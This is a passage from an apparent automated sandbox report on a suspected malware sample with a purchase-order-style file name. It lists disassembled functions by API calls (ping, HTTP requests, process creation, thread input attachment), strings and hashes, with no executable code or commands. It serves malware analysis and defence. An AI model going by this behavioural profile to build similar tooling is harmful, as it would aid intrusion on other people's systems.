IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0045824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 004582C2
WSACleanup.WSOCK32 ref: 004582C8

Strings

Ping, xrefs: 004581EB

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 578c9b1b206952d302affdcfa7746bd2bdf3308ed4e33d94786b63cbb9f18845
Instruction ID: 6169de0f2218d960c0ab1a07c4e34582c49a3c026cf62a9345236731c9483be2
Opcode Fuzzy Hash: 578c9b1b206952d302affdcfa7746bd2bdf3308ed4e33d94786b63cbb9f18845
Instruction Fuzzy Hash: 5B5190316046009FD710AF65CC45B2ABBE4AF48315F04496EFE95A72E2DF78E849CB4A

Function 0044E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0044E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0044E40C
GetLastError.KERNEL32 ref: 0044E416
SetErrorMode.KERNEL32(00000000,READY), ref: 0044E483

Strings

INVALID, xrefs: 0044E455
READY, xrefs: 0044E45C
UNKNOWN, xrefs: 0044E43B
NOTREADY, xrefs: 0044E442
READONLY, xrefs: 0044E44E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 01ba7ce30ddbc10fde12fee7c343b026316a3d7d4d61aa6e2f42a8b7e63d1a86
Instruction ID: deef7bb9133456d45671f0089767791a2d6dc48f87c92770ff7c575c249a761d
Opcode Fuzzy Hash: 01ba7ce30ddbc10fde12fee7c343b026316a3d7d4d61aa6e2f42a8b7e63d1a86
Instruction Fuzzy Hash: F7319635A00205DFE701DFA6C885ABEBBB4FF04304F14852BE505A72D1D7789902CB59

Function 0043B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0043B98C
GetDlgCtrlID.USER32 ref: 0043B997
GetParent.USER32 ref: 0043B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 0043B9B6
GetDlgCtrlID.USER32(?), ref: 0043B9BF
GetParent.USER32(?), ref: 0043B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 0043B9DE

Strings

ComboBox, xrefs: 0043B911
ListBox, xrefs: 0043B949

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: dbc92e309fbd87042e98a085dc08232db74a3d0a2d77a6c6151f13f060f681ec
Instruction ID: a07899d160a5e18dd00fdcc05e482e6a444e85eff54bdb180093bf107e1422ec
Opcode Fuzzy Hash: dbc92e309fbd87042e98a085dc08232db74a3d0a2d77a6c6151f13f060f681ec
Instruction Fuzzy Hash: 7621D6B4900108BFCB04ABA1DC86FFEB774EF49300F10022AF651A32E1DB785815DB68

Function 0043B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0043BA73
GetDlgCtrlID.USER32 ref: 0043BA7E
GetParent.USER32 ref: 0043BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 0043BA9D
GetDlgCtrlID.USER32(?), ref: 0043BAA6
GetParent.USER32(?), ref: 0043BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 0043BAC5

Strings

ComboBox, xrefs: 0043B9FA
ListBox, xrefs: 0043BA32

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: e08d3e9b6bcea1ab537f44f4cb328cf2293eb166a4cb553efef08ac92f0f9aab
Instruction ID: c0e5afae8c8e13aff3e19bf3cbcad26b141080f5ba7c41a1646e7bea24d3a6bf
Opcode Fuzzy Hash: e08d3e9b6bcea1ab537f44f4cb328cf2293eb166a4cb553efef08ac92f0f9aab
Instruction Fuzzy Hash: 5C21C5B4E00108BFDB01AB64DC85FFEB775EF49304F10012AF551A32D1EBB959159B68

Function 0045B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045B2D5
CoInitialize.OLE32(00000000), ref: 0045B302
CoUninitialize.OLE32 ref: 0045B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 0045B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 0045B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0045B56D
CoGetObject.OLE32(?,00000000,0048D91C,?), ref: 0045B590
SetErrorMode.KERNEL32(00000000), ref: 0045B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045B623
VariantClear.OLEAUT32(0048D91C), ref: 0045B633

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 301dd562f504750e18c9c09a54e90c3d09a2858f6c32928bb50ba07065798680
Instruction ID: 3a49f2702521660ca2d56ed100b0fa379dcf273da301727b518e4a995d1f856e
Opcode Fuzzy Hash: 301dd562f504750e18c9c09a54e90c3d09a2858f6c32928bb50ba07065798680
Instruction Fuzzy Hash: 64C13671608304AFC704EF65C88492BB7E9FF88309F00492EF9899B252D775ED09CB96

Function 00444025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00444047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,004430A5,?,00000001), ref: 0044405B
GetWindowThreadProcessId.USER32(00000000), ref: 00444062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004430A5,?,00000001), ref: 00444071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00444083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004430A5,?,00000001), ref: 0044409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004430A5,?,00000001), ref: 004440AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004430A5,?,00000001), ref: 004440F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004430A5,?,00000001), ref: 00444108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004430A5,?,00000001), ref: 00444113

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: e5d4fd48dc500434fe148b757332dce145f8f0d543d7b8699ee7a378b0749fbc
Instruction ID: 6ecddd2d5d529813481c134c16481e56c21dc0cb4356134cfef7aefd52ab227f
Opcode Fuzzy Hash: e5d4fd48dc500434fe148b757332dce145f8f0d543d7b8699ee7a378b0749fbc
Instruction Fuzzy Hash: 1631A772900204AFEB10DF54DC49F6E77A9BB98312F10C02AF905E6390DB78DD408B5C

Function 00403093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004030DC
CoUninitialize.OLE32(?,00000000), ref: 00403181
UnregisterHotKey.USER32(?), ref: 004032A9
DestroyWindow.USER32(?), ref: 00475079
FreeLibrary.KERNEL32(?), ref: 004750F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00475125

Strings

close all, xrefs: 004030D7

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: b4ecc819e782719df8c45d7ebc1308d01352aa1ef7aa02526371437d7e7e849f
Instruction ID: 5a794c083a5269744521f991c5528a76a1dc2fb916643718be34c64ed1899f27
Opcode Fuzzy Hash: b4ecc819e782719df8c45d7ebc1308d01352aa1ef7aa02526371437d7e7e849f
Instruction Fuzzy Hash: 19914E74601102DFC705EF15C895AA9F7A8FF05309F5481BEE50A6B2A2DF38AE56CF48

Function 0041CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0041CC15

Part of subcall function 0041CCCD: GetClientRect.USER32(?,?), ref: 0041CCF6
Part of subcall function 0041CCCD: GetWindowRect.USER32(?,?), ref: 0041CD37
Part of subcall function 0041CCCD: ScreenToClient.USER32(?,?), ref: 0041CD5F

GetDC.USER32 ref: 0047D137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0047D14A
SelectObject.GDI32(00000000,00000000), ref: 0047D158
SelectObject.GDI32(00000000,00000000), ref: 0047D16D
ReleaseDC.USER32(?,00000000), ref: 0047D175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0047D200

Strings

U, xrefs: 0047D0D5

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: a1c2d8b331fa4b7bb6e904f4e3bae0450808739646f069972dd56e74f4a1e8b2
Instruction ID: 9a6e06668591dea6332ce3a20a7db368b064226a46ae5558b1ec45aff3e26ff4
Opcode Fuzzy Hash: a1c2d8b331fa4b7bb6e904f4e3bae0450808739646f069972dd56e74f4a1e8b2
Instruction Fuzzy Hash: C1710630900205DFCF219F64CC81AEA3BB1FF48314F14866BED599A2A6D7399C82DF59

Function 00AF1A1B Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(00000000), ref: 00AF1A3E

Strings

log10, xrefs: 00AF1A88, 00AF1AD8
exp, xrefs: 00AF1B03, 00AF1B65
sqrt, xrefs: 00AF1BC2
asin, xrefs: 00AF1BAA
pow, xrefs: 00AF1B22, 00AF1BCE, 00AF1BE1
acos, xrefs: 00AF1BB6
log, xrefs: 00AF1AE4, 00AF1AF0

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 78cffae3901bf6ac20d5b9c6b64f84de1aa513b717e37146f98a54851f8a1fe6
Instruction ID: ed57f77e42200778b187e989476ad21b0c9dc5095bbb473750fac1528d0adc5f
Opcode Fuzzy Hash: 78cffae3901bf6ac20d5b9c6b64f84de1aa513b717e37146f98a54851f8a1fe6
Instruction Fuzzy Hash: 11512471A0490ECBCB14AFE8E9485FDBBB4FF49310F600195E681A72A4DB758E24DB54

Function 0046ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

Part of subcall function 0041B63C: GetCursorPos.USER32(000000FF), ref: 0041B64F
Part of subcall function 0041B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0041B66C
Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000001), ref: 0041B691
Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000002), ref: 0041B69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0046ED3C
ImageList_EndDrag.COMCTL32 ref: 0046ED42
ReleaseCapture.USER32 ref: 0046ED48
SetWindowTextW.USER32(?,00000000), ref: 0046EDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046EE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0046EEDC

Strings

@GUI_DROPID, xrefs: 0046EE33
@GUI_DRAGFILE, xrefs: 0046EE77

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 7dd245f07ec66fcb69d7960a22f03c09ededebc6b62677e0d681709a8d065ff4
Instruction ID: a7776d5b36f7ee75d5a2d2972a908be155b85c6b5756da9afb6625da37bf1bac
Opcode Fuzzy Hash: 7dd245f07ec66fcb69d7960a22f03c09ededebc6b62677e0d681709a8d065ff4
Instruction Fuzzy Hash: 3451CE74204300AFD700EF21DC96FAA77E4FB88708F004A2EF555972E2EB799954CB5A

Function 004545C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004545FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0045466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00454682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0045468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004546BF
InternetCloseHandle.WININET(00000000), ref: 00454706

Part of subcall function 00455052: GetLastError.KERNEL32(?,?,004543CC,00000000,00000000,00000001), ref: 00455067

Strings

, xrefs: 004546B8

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: a045060e8911059459431702f3733a8007696582b43d561265531298ad99e5da
Instruction ID: 06e4a2979523fa4a57f0d8e8717a317025dbf267735069217734f69923b342c5
Opcode Fuzzy Hash: a045060e8911059459431702f3733a8007696582b43d561265531298ad99e5da
Instruction Fuzzy Hash: FF4170B1501205BFEB019F50CC85FBF77ACEF49719F00402AFE059A186D77899899BA8

Function 0045B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0049DC00), ref: 0045B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0049DC00), ref: 0045B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0045B8C1
SysFreeString.OLEAUT32(?), ref: 0045B8EB

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 4982fa3a0f05e41a5b350e1a50a919fd4e6bbf6e1a210c163b9f95837ca6325d
Instruction ID: 2a68371652a71209ab2e3705f17ac1a5083255551f6ec9de84d798a73dae6afb
Opcode Fuzzy Hash: 4982fa3a0f05e41a5b350e1a50a919fd4e6bbf6e1a210c163b9f95837ca6325d
Instruction Fuzzy Hash: F6F16F71A00209EFCF04EF94C884EAEB7B9FF48315F10855AF905AB251DB35AE46CB94

Function 004624D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004624F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00462688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004626AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004626EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0046270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0046286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004628A1
CloseHandle.KERNEL32(?), ref: 004628D0
CloseHandle.KERNEL32(?), ref: 00462947

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 28627dc041d2b1224d2551d97f425b19d1c36539e168d181bcabc899cc5813f2
Instruction ID: 297d9b7ce7acee4b45dcf329f4ac40872c5cbc720c169c6e9c03bb5cd95c0242
Opcode Fuzzy Hash: 28627dc041d2b1224d2551d97f425b19d1c36539e168d181bcabc899cc5813f2
Instruction Fuzzy Hash: 92D1B231604700EFCB14EF25C991A6EBBE1AF84314F14856EF8859B3A2DB78DC45CB5A

Function 0046B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0046B3F4

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: ab9fc08601ebb2c91194f8ccf8b03e13aa72e8646b51a6a5d94ddda0b10f235f
Instruction ID: 37315d118532037fd48edcb4b58127136346e69ed462c9549075cd98b53ef0c5
Opcode Fuzzy Hash: ab9fc08601ebb2c91194f8ccf8b03e13aa72e8646b51a6a5d94ddda0b10f235f
Instruction Fuzzy Hash: 44517431600204BBDF249F158C85B9E3B64EB05318F644517FA15D63E2EB79E9D08BDA

Function 0041A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0047DB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0047DB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0047DB51
